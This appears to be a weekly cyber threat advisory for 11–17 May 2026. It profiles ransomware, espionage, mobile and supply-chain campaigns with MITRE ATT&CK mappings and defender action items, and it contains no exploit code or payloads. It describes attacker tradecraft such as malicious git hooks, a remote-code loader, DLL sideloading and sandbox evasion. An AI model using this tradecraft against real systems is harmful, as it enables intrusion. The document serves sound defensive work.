Weekly Threat Advisory: Top Cyber Adversaries May 11 – 17, 2026

⚠ Weekly Threat Advisory — New Adversaries, Fresh Tradecraft, 11 – 17 May 2026

What This Advisory Covers — Read This First

This advisory is written for the full security audience — from analysts beginning their first SOC rotation, through threat hunters and detection engineers, to CISOs and security leadership. Three reading paths are supported:

• Five-minute skim: read the headline takeaway, the “This Week in Numbers” panel, and the Top 10 chart. You will leave knowing the three campaigns that matter this week and the one critical vulnerability you should patch.
• Twenty-minute analyst read: add the “Featured Adversary Profiles” section, the MITRE ATT&CK Dashboard, and “How to Operationalise”. You will leave with named adversaries, mapped techniques, and a concrete action checklist for your environment.
• Forty-minute deep dive: read everything end-to-end, including the indicator tables and external sources. You will leave with a full operational dataset ready to ingest into your SIEM, EDR, NDR or SOAR.

Every figure in this advisory comes from our ML-scored intelligence pipeline for the 11–17 May 2026 window. We have deliberately de-duplicated against last week’s advisory — none of the adversaries or indicators below appeared in the prior advisory, so this is a snapshot of genuinely new activity. Where a term might be unfamiliar, the glossary at the bottom of this advisory provides plain-English definitions.

The Headline in Three Sentences

The week’s defining story is the public debut of The Gentlemen as a fully analysed ransomware-as-a-service operation, supported by both an operator-side intelligence leak (external research teams) and defender-side incident-response forensics (incident-response research). Five new state-sponsored campaigns surface in a single week — Iran (Seedworm), Belarus (FrostyNeighbor), China-nexus (FamousSparrow and the suspected China-linked TencShell), and North Korea (Lazarus using a fresh Git-hooks execution technique). One critical vulnerability dominates the patch queue: CVE-2026-41940, a CVSS 9.8 authentication-bypass in cPanel and Web Host Manager, which has moved from disclosure to mass scanning inside a fortnight.

This Week in Numbers

• 35 distinct adversaries surfaced exclusively this week — none appeared in our prior advisory.
• 567 unique indicators of compromise across four observable types — Hash artefacts lead at 294, Domains at 160, URLs at 75, IPs at 38.
• Severity composition: 498 indicators (88%) at High, 65 at Low, 4 at Medium.
• By classification: Malware 310 · Malware Campaigns 102 · Threat Actors 53 · SCAN 51 · Ransomware 33 · Phishing Campaigns 14 · C2 Infrastructure 4.
• State-sponsored coverage: Five distinct nation-state attributions in a single week — Iran, Belarus, China-nexus (x2), North Korea — the densest concentration we have catalogued this quarter.

Key Trends Driving the Week

• The Gentlemen graduates from an underground forum brand to a fully analysed ransomware-as-a-service. external research teams published the operator’s leaked Rocket database on 4 May, exposing nine internal accounts including the lead — known by the handle zeta88 (alias hastalamuerte) — who builds the locker, runs the panel, and manages payouts. Initial-access pathways span a network-security vendor and Cisco edge appliance exploitation, NTLM relay, and credential harvesting from Outlook Web Access and Microsoft 365 logs. The incident-response research’s parallel disclosure captures the operational chain: EtherRAT initial implant, TukTuk command-and-control over SaaS and blockchain transports, commercial remote-management platforms hands-on-keyboard, and The Gentlemen ransomware as the impact stage.
• Hologram introduces a six-binary modular implant framework with novel C2 transport. external research teams’s analysis covers multiple infection waves. The second wave introduces a Hookdeck-based command-and-control relay and the first documented use of clroxide in a crimeware campaign. The operator’s choice to route through Azure DevOps, Telegram, and Hookdeck is deliberate: each is a legitimate service inside virtually every enterprise allow-list.
• Kong RAT industrialises SEO poisoning against Chinese-speaking technical users. external research teams’s blog documents a campaign running from at least May 2025 through March 2026 that poisons search engine results for FinalShell, Xshell, QuickQ VPN, Clash proxy, and LeTV-related VPN searches. Victims are funneled through lookalike Chinese software portals hosting trojanised installers.
• Coruna and DarkSword extend mobile exploitation to iOS through cryptocurrency-reward lures. Palo Alto Unit 42 documents new infrastructure delivering Coruna and DarkSword exploits via fake crypto-reward scam pages.
• FrostyNeighbor refreshes tooling against Ukrainian government targets. external threat researchers’s analysis covers fresh activity from March 2026, including server-side victim validation before final payload delivery — a tradecraft choice that systematically defeats sandbox-based analysis.
• Lazarus pivots to Git hooks for malware execution. Open Source Malware documents a fresh evolution of the North Korean “Contagious Interview” campaign. Developers approached through fake job interviews are asked to clone a GitHub repository; a malicious .git/hooks/pre-commit script executes on first commit.
• Seedworm targets at least nine organisations across four continents in Q1 2026. external research teams’s analysis covers an Iran-linked espionage campaign exploiting DLL sideloading via legitimately signed Fortemedia and enterprise endpoint security platforms binaries.
• Cloud-native phishing reaches a new technical floor with BlobPhish. external research teams describes a campaign whose phishing payload exists exclusively in browser memory and produces no server-side network artefact.
• Supply-chain pressure broadens across the open-source ecosystem. Three independent disclosures: the malicious pull request against CNCF Antrea (rejected); the Open-OSS/privacy-filter Hugging Face repository that typosquatted OpenAI’s legitimate Privacy Filter release and reached 200,000 downloads; and TeamPCP’s backdoored Checkmarx Jenkins plugin.
• JDownloader confirms a supply-chain compromise. Attackers exploited an unpatched CMS vulnerability on the JDownloader site to redirect specific download links to malicious third-party files containing a Python-based remote access trojan during 6–7 May 2026.
• TrickMo migrates its banking command-and-control onto The Open Network (TON). external research teams’s research documents a new variant active across France, Italy, and Austria. The primary C2 channel has shifted to TON via .adnl endpoints with embedded local TON proxy.
• CVE-2026-41940 moves from disclosure to mass exploitation. The 51 SCAN indicators in this week’s feed are scanner infrastructure enumerating exposed cPanel and Web Host Manager installations.

MITRE ATT&CK Tactic Coverage — A Strategic Dashboard

Every adversary in this advisory has been mapped to the MITRE ATT&CK Enterprise Matrix (v15). The chart below shows how many of this week’s 35 adversaries land on each of the 14 ATT&CK tactics. For analysts and SOC managers, this is a strategic dashboard: it tells you where your detection coverage will be exercised most heavily this week, and where the operational pressure is concentrated.

What this means for analysts: the heaviest concentration sits on Execution (28), Command and Control (27), Defense Evasion (24), and Initial Access (23). If your team has not validated detections across these tactics in the last quarter, this is the week to run the table-top. Lower-coverage tactics — Reconnaissance (2), Impact (5), Lateral Movement (7) — should not be misread as low-risk; they are simply less represented in this week’s specific corpus.

Threat Distribution by Severity and Category

The severity-to-volume ratio in the filtered set tilts more sharply toward high-confidence indicators than the equivalent unfiltered view, propelled by the FrostyNeighbor, Seedworm, Lazarus, and FamousSparrow surges — all four clusters score consistently at confidence 97 because of robust, externally corroborated attribution.

• High severity: 498 indicators
• Low severity: 65 indicators (predominantly CVE-2026-41940 scanner reconnaissance)
• Medium severity: 4 indicators

Featured Adversary Profiles — Top 10 With Plain-English Context and MITRE Mapping

Each profile below includes a plain-English summary line (for newer analysts and non-specialist readers), a technical description, and the MITRE ATT&CK techniques mapped to the adversary. Where techniques were not provided in source reporting, we have applied our own MITRE mapping based on the documented behaviours.

1. Coruna — iOS Exploitation via Cryptocurrency Lures

In plain English: Attackers are using fake “claim your crypto reward” websites to deliver iOS malware to Apple users. Predominantly a domain-driven operation.

Technical summary: Malware · 99 indicators · High severity · Confidence 85. Palo Alto Unit 42 documents the campaign delivering Coruna and DarkSword exploits to iOS users via fake cryptocurrency-reward scam pages. 93 of the 99 indicators are domain infrastructure — push the set into enterprise mobile-management blocklists and corporate DNS resolvers immediately.

MITRE ATT&CK: T1566.002 (Spearphishing Link) · T1204.001 (User Execution: Malicious Link) · T1583.008 (Malvertising) · T1190 (Exploit Public-Facing Application) · T1071.001 (Web Protocols).

2. TencShell — Suspected China-Linked Custom Implant

In plain English: A previously-unknown stealth implant traced in a global manufacturer’s network. Uses fake web-font files and in-memory code to hide. Researchers suspect a Chinese state-linked operator but stop short of definitive attribution.

Technical summary: Malware · 55 indicators · High severity · Confidence 85. Cato CTRL identifies TencShell as a previously-undocumented Go-based implant derived from the open-source Rshell C2 framework. The intrusion chain uses a first-stage dropper, Donut shellcode, a masqueraded .woff web-font resource, memory injection, and web-like C2.

MITRE ATT&CK: T1105 (Ingress Tool Transfer) · T1055 (Process Injection) · T1620 (Reflective Code Loading) · T1036.008 (Masquerade File Type) · T1071.001 (Web Protocols) · T1027 (Obfuscated Files or Information).

3. CVE-2026-41940 — cPanel and WHM Authentication Bypass (Active Scanning)

In plain English: A critical security flaw in cPanel and Web Host Manager — software that runs many shared-hosting websites. Attackers can bypass the login screen entirely and take over servers. Mass scanning for vulnerable installations is happening right now.

Technical summary: SCAN · 51 indicators · Low severity · Confidence 22. CVSS 9.8 authentication-bypass affecting cPanel and Web Host Manager. Successful exploitation grants unauthenticated remote attackers complete administrative control. The 51 scanner indicators represent operator infrastructure enumerating exposed installations.

MITRE ATT&CK: T1595.002 (Active Scanning: Vulnerability Scanning) · T1190 (Exploit Public-Facing Application) · T1078 (Valid Accounts via session impersonation).

4. Hologram — Modular Implant Framework with Hookdeck C2

In plain English: A piece of malware delivered as a fake software installer for OpenClaw. It routes its command channel through legitimate services (Azure DevOps, Telegram, Hookdeck) that virtually every enterprise allows by default.

Technical summary: Malware · 47 indicators · High severity · Confidence 85. external research teams documents Hologram as a dropper-delivered six-binary modular implant. Hologram is the first documented use of clroxide in a crimeware campaign. A third wave rotated infrastructure during external research teams’s analysis.

MITRE ATT&CK: T1204.002 (Malicious File) · T1036.005 (Match Legitimate Name) · T1102 (Web Service for C2) · T1027 (Obfuscation) · T1055 (Process Injection) · T1105 (Ingress Tool Transfer) · T1071.001 (Web Protocols).

5. Kong RAT — SEO-Poisoning Remote Access Trojan

In plain English: Attackers are running Google search-result poisoning targeted at Chinese-speaking developers and IT admins. When someone searches for tools like FinalShell, Xshell, or Clash, they land on fake software portals that install malware.

Technical summary: Malware · 41 indicators · High severity · Confidence 85. external research teams documents a campaign running from May 2025 through March 2026, poisoning search results so victims arriving from searches for FinalShell, Xshell, QuickQ VPN, Clash, and LeTV-related VPNs are funneled through lookalike domains hosting trojanised installers.

MITRE ATT&CK: T1608.006 (SEO Poisoning) · T1189 (Drive-by Compromise) · T1204.002 (Malicious File) · T1036.005 (Match Legitimate Name) · T1105 (Ingress Tool Transfer) · T1071.001 (Web Protocols) · T1567 (Exfiltration Over Web Service).

6. EtherRAT — Multi-Platform Implant (Stage 1 of The Gentlemen Chain)

In plain English: The first stage of an end-to-end ransomware intrusion. Delivered as a malicious Windows installer disguised as a Sysinternals utility, EtherRAT establishes the initial foothold before the operator escalates to ransomware.

Technical summary: Malware · 35 indicators · High severity · Confidence 85. The incident-response research’s flash bulletin documents EtherRAT delivery via a malicious MSI disguised as a Sysinternals utility. EtherRAT was first identified by external research teams in December 2025 on Linux servers; external research teams documented the Windows variant in March 2026.

MITRE ATT&CK: T1204.002 (Malicious File / MSI) · T1036.005 (Masquerading) · T1059.001 (PowerShell) · T1105 (Ingress Tool Transfer) · T1071.001 (Web Protocols) · T1041 (Exfiltration over C2 channel).

7. CallPhantom — Android Subscription Fraud

In plain English: A cluster of Android apps promising users access to call histories and WhatsApp records for any phone number. They charge subscriptions but return randomly generated fake data. Millions of users affected.

Technical summary: Malware Campaign · 34 indicators · High severity · Confidence 80. external threat researchers documents the campaign. Worth surfacing to corporate mobile-device-management teams and security-awareness messaging.

MITRE ATT&CK (Mobile Matrix): T1660 (Phishing) · T1418 (Software Discovery) · T1532 (Archive Collected Data) · T1485 (Data Destruction) — adapted to mobile-platform fraud techniques.

8. The Gentlemen — Ransomware-as-a-Service Brand

In plain English: A new ransomware crew has emerged with a fully professionalised business model. An accidental data leak revealed nine operator accounts, their pricing, and a confirmed payment of $190,000 USD from a victim. They get into networks through edge appliance flaws and Microsoft 365 credential theft.

Technical summary: Ransomware · 33 indicators · High severity · Confidence 90. external research teams’s analysis, published on the back of a leaked Rocket backend database, documents nine operator accounts. Initial-access vectors span a network-security vendor and Cisco edge appliances, NTLM relay, and Outlook Web Access and Microsoft 365 credential logs. Confirmed ransom of $190,000 USD against an opening anchor of $250,000 USD.

MITRE ATT&CK: T1190 (Exploit Public-Facing Application) · T1187 (Forced Authentication / NTLM Relay) · T1078 (Valid Accounts) · T1098 (Account Manipulation) · T1486 (Data Encrypted for Impact) · T1657 (Financial Theft) · T1659 (Content Injection).

9. FrostyNeighbor — Belarus-Aligned Espionage

In plain English: A state-aligned hacking group from Belarus, primarily targeting Ukrainian government computers. Their distinctive trick is to check the victim’s environment from the server before delivering the real malware — this defeats most automated sandbox analysis tools.

Technical summary: Threat Actor · 21 indicators · High severity · Confidence 97. external threat researchers documents fresh operational activity beginning March 2026 against Ukrainian government targets. The 13 file-hash artefacts in this week’s feed should be treated as authoritative triggers regardless of sandbox verdict.

MITRE ATT&CK: T1566.001 (Spearphishing Attachment) · T1059.001 (PowerShell) · T1105 (Ingress Tool Transfer) · T1027 (Obfuscated Files) · T1480 (Execution Guardrails / Server-Side Validation) · T1102.002 (Bidirectional Web Service C2) · T1071.001 (Web Protocols).

10. Seedworm — Iran-Linked Q1 2026 Espionage

In plain English: An Iranian state-aligned actor that hit at least nine organisations on four continents in the first quarter of 2026, including a near-week-long intrusion at a South Korean electronics manufacturer. They hide their malware by signing it with legitimate certificates from Fortemedia and enterprise endpoint security platforms.

Technical summary: Threat Actor · 20 indicators · High severity · Confidence 97. external research teams documents the campaign. DLL sideloading with legitimately signed binaries; node.exe-based implant chain; PowerShell modules for reconnaissance, screenshot capture, SAM hive theft, privilege escalation, and SOCKS5 reverse-proxy tunnelling.

MITRE ATT&CK: T1574.002 (DLL Side-Loading) · T1059.001 (PowerShell) · T1056.001 (Keylogging) · T1113 (Screen Capture) · T1003.002 (LSASS Memory / SAM Hive) · T1547.001 (Registry Run Keys) · T1572 (Protocol Tunneling) · T1090.001 (Internal Proxy / SOCKS5) · T1071.001 (Web Protocols).

State-Sponsored Activity Spotlight

Lazarus — DPRK “Contagious Interview” Evolution via Git Hooks

In plain English: North Korean operators recruit developers through fake job interviews and ask them to clone a GitHub repository as a “coding test.” Hidden inside is a script that runs the moment the developer makes their first commit. The technique abuses normal developer workflow trust.

Technical summary: Threat Actor · 5 indicators · High severity · Confidence 97. The novel element is the execution path: a malicious .git/hooks/pre-commit script hidden inside the repository, triggered on the developer’s first commit.

MITRE ATT&CK: T1566.003 (Spearphishing via Service) · T1195.001 (Supply Chain Compromise: Developer Tools) · T1546.004 (Event Triggered Execution: Unix Shell Configuration) · T1059.004 (Unix Shell) · T1567 (Exfiltration Over Web Service).

FamousSparrow — China-Nexus Operations Against Azerbaijani Oil and Gas

In plain English: A Chinese state-aligned hacking group that quietly stayed inside an Azerbaijani oil and gas company’s network for about ten weeks across December 2025 to February 2026.

Technical summary: Threat Actor · 4 indicators · High severity · Confidence 97. external threat researchers’s disclosure documents the multi-wave intrusion. Attribution to FamousSparrow — overlapping with the Earth Estries threat ecosystem — is rated at moderate-to-high confidence.

MITRE ATT&CK: T1190 (Exploit Public-Facing Application) · T1078 (Valid Accounts) · T1574.002 (DLL Side-Loading) · T1027 (Obfuscation) · T1059.001 (PowerShell) · T1071.001 (Web Protocols) · T1041 (Exfiltration Over C2).

ShinyHunters — Data-Theft Operator Returns Against Instructure Canvas

In plain English: A financially-motivated data-theft crew responsible for several high-profile breaches. They have now hit Instructure (which runs the Canvas learning-management platform used by schools) for the second time in eight months. Names, emails, student IDs, and some private messages exposed.

Technical summary: Threat Actor · 3 indicators · High severity · Confidence 97. external threat researchers’s advisory documents Instructure confirming a breach affecting Canvas after unauthorized activity on 1 May. Exposure window 30 April to 7 May 2026.

MITRE ATT&CK: T1190 (Exploit Public-Facing Application) · T1078 (Valid Accounts) · T1530 (Data from Cloud Storage) · T1567 (Exfiltration Over Web Service) · T1657 (Financial Theft via Extortion).

The Week’s Defining New Ransomware: The Gentlemen Operational Profile

Two complementary disclosures define what defenders need to know about The Gentlemen. external research teams provides the operator-side view from the leaked Rocket database; The incident-response research provides the defender-side view from incident-response forensics. The diagram below combines both into a single intrusion chain.

Operationally, the strongest defender lesson is the chain’s reliance on legitimate enterprise tooling at every stage. If your environment uses commercial remote-management platforms legitimately, baseline its expected traffic profile this week — otherwise the anomaly window stays unalertable when it matters most. The 33 indicators catalogued for The Gentlemen ransomware itself, combined with the 35 indicators for EtherRAT, produce a fully ingestible detection set ready for SIEM consumption.

Critical Vulnerability of the Week — CVE-2026-41940

In plain English: If your company website or your customer-facing services run on cPanel-based hosting (extremely common across small business and managed hosting), this is the patch that must happen this week. The vulnerability lets anyone on the internet become an administrator of the hosting environment without needing a password.

Technical summary: CVE-2026-41940 is a critical authentication-bypass vulnerability affecting cPanel and Web Host Manager (WHM) with a CVSS score of 9.8. The flaw permits remote attackers to circumvent the cPanel authentication mechanism entirely and obtain administrative access without legitimate credentials. The 51 SCAN-classified indicators in this week’s feed represent scanner infrastructure actively enumerating exposed installations. Operators of cPanel-based hosting environments should treat patching as the highest priority of the week. Managed-hosting customers should require written confirmation from their provider that the vulnerability has been remediated across the underlying fleet.

Supply-Chain Pressure — Four Independent Disclosures

Open-OSS/privacy-filter — Typosquatting OpenAI on Hugging Face

external research teams’s research documents malicious code in the Hugging Face repository Open-OSS/privacy-filter, which at peak ranked among the platform’s top trending repositories with over 200,000 downloads. The repository typosquatted OpenAI’s legitimate Privacy Filter release, copied the model card nearly verbatim, and shipped a loader.py file that fetched and executed infostealer malware on Windows machines. MITRE: T1195.001 · T1608.006 · T1105 · T1059.006 (Python).

JDownloader — CMS Compromise Yields Malicious Installers

The JDownloader project’s official incident page confirms attackers exploited an unpatched vulnerability in the site’s content-management system to redirect specific download links to malicious third-party files containing a Python-based remote access trojan. Compromise window: 6–7 May 2026. MITRE: T1195.002 · T1190 · T1608.001 · T1059.006.

TeamPCP — Backdoored Checkmarx Jenkins Plugin

external research teams’s reporting documents TeamPCP — already known for the Checkmarx GitHub Actions and OpenVSX compromises earlier this year — returning with a backdoored Checkmarx Jenkins plugin. The threat actor defaced and renamed the Checkmarx Jenkins AST plugin repository on GitHub and shipped a backdoored release described in their own messaging as “Dune-themed malware.” MITRE: T1195.002 · T1554 (Compromise Client Software Binary) · T1078.

CNCF Antrea — Malicious Pull Request Attempt

Open Source Malware documents a threat actor opening a malicious pull request against the CNCF Antrea project on 2 May, engineering CI poisoning to exfiltrate credentials. The pull request was identified and rejected before merge. MITRE: T1195.002 · T1213.003 (Code Repositories) · T1078.

Mobile and Browser Threats

TrickMo — Banking Malware on The Open Network (TON)

external research teams documents a new TrickMo variant active across France, Italy, and Austria. Primary command-and-control channel has migrated onto The Open Network (TON) via .adnl endpoints routed through an embedded local TON proxy. The variant adds SSH tunnelling and SOCKS5 proxying capabilities. MITRE (Mobile): T1418 · T1641 · T1430 · T1571 · T1572.

Fake TronLink Chrome Extension

external research teams’s analysis documents a phishing campaign targeting TRON wallet users through a deceptive Chrome extension impersonating TronLink. Inherited metrics (over 1,000,000 users, strong ratings) borrowed from a previously legitimate extension whose listing the attackers hijacked. MITRE: T1176 (Browser Extensions) · T1539 (Steal Web Session Cookie) · T1657 (Financial Theft).

OPERATION SILENTCANVAS — JPEG-Based PowerShell Loader

external research teams documents a campaign leveraging a malicious PowerShell payload disguised as sysupdate.jpeg, executing via a trojanised remote-monitoring and management tools instance. The intrusion abuses legitimately signed remote-monitoring tools binaries alongside a tampered, unsigned remote-monitoring platforms.Core.dll. MITRE: T1204.002 · T1036.008 · T1059.001 · T1219 · T1027.

PySoxy — ClickFix Evolution Using a 10-Year-Old Python Proxy

external research teams documents a new ClickFix variant using scheduled tasks for persistence and PySoxy — a decade-old open-source Python SOCKS5 proxy — to establish encrypted proxy access. MITRE: T1059.006 (Python) · T1090.001 (Internal Proxy) · T1572 (Protocol Tunneling) · T1053 (Scheduled Task).

Geographic Targeting This Week

• South Caucasus energy sector: FamousSparrow operations against Azerbaijani oil and gas.
• Eastern Europe / Ukraine: FrostyNeighbor activity against Ukrainian government targets.
• South Korea, Southeast Asia, Latin America, Middle East: Seedworm Q1 2026 campaign across four continents.
• France, Italy, Austria: TrickMo banking-and-wallet operations.
• Global / multi-region: Coruna, Hologram, Kong RAT, The Gentlemen, and the cPanel scanner population.
• Chinese-speaking developer communities: Kong RAT SEO-poisoning explicitly targets this cohort.

How to Operationalise This Advisory in Your Environment

1. Patch cPanel and WHM against CVE-2026-41940 this week. The CVSS 9.8 rating, confirmed active scanning, and near-zero exploitation barrier combine to make this the highest single priority of the week for any organisation operating or depending on cPanel-based hosting.
2. Convert the EtherRAT → TukTuk → The Gentlemen kill chain into a sequence-aware detection. Cross-reference our Markov-chain kill-chain detection playbook.
3. Baseline commercial remote-management platforms, remote-monitoring and management tools, and other RMM traffic immediately. The Gentlemen chain and OPERATION SILENTCANVAS both exploit legitimate remote-management tooling.
4. Push the Coruna and Kong RAT domain sets into enterprise mobile-management and DNS recursive resolvers.
5. Audit Hugging Face, npm, PyPI, and Chrome-Web-Store usage policies in your engineering organisation. Four independent supply-chain compromises landed this week.
6. Treat FrostyNeighbor server-side validation as an instruction to abandon sandbox-only analysis pipelines. Pair sandbox output with the static hash list and treat the static indicators as authoritative.
7. BlobPhish demands browser telemetry, not network telemetry. Advocate for browser-extension or digital-experience-monitoring coverage on your highest-value Microsoft 365 and SaaS user populations.
8. Pair this advisory with the kill-chain hunts in our VPC Flow Log series. Specifically adaptive C2 beacon detection, TLS fingerprinting, and DGA and DNS-tunnel hunting.

Full Weekly IOC Summary — All 35 Unique Adversaries

The complete dataset is available on request via the contact page — we make this intelligence available to qualified SOC and CERT teams free of charge.

Top 20 Indicators Per Type — Unique to This Week

Ranking combines severity (High over Medium over Low) and ML-derived confidence score, breaking ties by most-recent detection. All values shown are new — none appear in last week’s reporting.

Top 20 IP Addresses

Top 20 Domains

Top 20 File Hashes

Top 20 URLs

Glossary — Terms Used in This Advisory

• IOC (Indicator of Compromise): a piece of evidence — an IP, domain, file hash, URL, or email — that suggests a system has been compromised.
• APT (Advanced Persistent Threat): a well-resourced, typically state-sponsored cyber-attack group that maintains long-term access to compromised environments.
• RAT (Remote Access Trojan): malware that gives a remote operator interactive control over an infected machine — file transfer, command execution, screen capture, etc.
• C2 / Command and Control: the infrastructure an attacker uses to communicate with their malware after it has infected a target.
• Ransomware-as-a-Service (RaaS): a business model where a core team builds and operates the ransomware while affiliates carry out the actual intrusions in exchange for a share of the ransom.
• MITRE ATT&CK: a globally-used knowledge base of adversary tactics and techniques. Each technique has an identifier like T1190. The current version is v15 of the Enterprise Matrix.
• CVE (Common Vulnerabilities and Exposures): a unique identifier for a publicly-disclosed security vulnerability. Format: CVE-YYYY-NNNNN.
• CVSS (Common Vulnerability Scoring System): a 0.0–10.0 score quantifying how severe a CVE is. 9.0+ is “critical.”
• SOC (Security Operations Centre): the team responsible for detecting and responding to security incidents.
• SIEM (Security Information and Event Management): the central platform a SOC uses to ingest, search, and alert on security telemetry.
• EDR / NDR / XDR / SOAR: different classes of detection and response tooling, focused on endpoints (EDR), network (NDR), unified (XDR), and automation (SOAR).
• IOC pipeline: the automated system that ingests, scores, and de-duplicates indicators from threat intelligence feeds.
• Confidence score: a 0–100 value our ML pipeline assigns to each indicator based on source reliability, corroboration, and intrinsic indicator quality.
• DLL Side-Loading (T1574.002): a technique where attackers place a malicious DLL alongside a legitimate signed binary so the legitimate binary loads it at runtime.
• NTLM Relay: a Microsoft Windows authentication attack that forwards captured credentials to a third system to gain unauthorised access.
• OWA / M365: Outlook Web Access and Microsoft 365 — common credential-theft targets.
• RMM Tool: Remote Monitoring and Management software (e.g., remote-monitoring and management tools, commercial remote-management platforms, commercial remote-access tools) used legitimately by IT teams and frequently abused by adversaries.

Related Reading on HACKFORLAB

• Previous Weekly Threat Advisory — 04 to 10 May 2026
• Adaptive C2 Beacon Detection: FFT and DBSCAN on VPC Flow Logs
• DGA and DNS-Tunnel Hunting at Scale on VPC Flow Logs
• TLS Fingerprinting (JA3, JA4, JARM) for Encrypted C2 Hunting
• Living-off-the-Cloud Attack-Chain Detection: CloudTrail and VPC Flow Fusion
• Living-off-the-Land Kill Chain Detection with Markov Chains
• Threat Hunting for Cloud Attacks
• Hunting AWS Identity Attacks
• AWS Bedrock Threat Hunting: A CloudTrail Log Analysis Playbook

HACKFORLAB Threat Hunt Intelligence Platform

Every adversary, indicator, and technique referenced in this advisory is operational right now on our hosted threat-hunting workbench. SOC, CERT, MSSP, and detection-engineering teams use the platform to pivot indicators against live telemetry, enrich on demand, query historical adversary attribution, and track campaign evolution week over week.

Sign in to start hunting: https://huntintel.hackforlab.com/login.html

Happy Threat Hunting

If this advisory sharpened your team’s posture this week, share it with your peers, subscribe to the feed, and send us your war stories — the sharper our reader signal, the sharper the next edition becomes. Stay paranoid. Stay patched. Happy threat hunting.

#threathunting #threatintelligence #cybersecurity #threatactor #malware #ransomware #phishing #threatadvisory #CTI #IOC #CyberThreatIntel #TTPs #OSINT #CyberDefense #weeklythreatbriefing #TheGentlemen #EtherRAT #FrostyNeighbor #Seedworm #FamousSparrow #Lazarus #Hologram #KongRAT #Coruna #BlobPhish #TrickMo #ShinyHunters #TencShell #cPanel #SupplyChainAttack #MITREATTACK #SOC #BlueTeam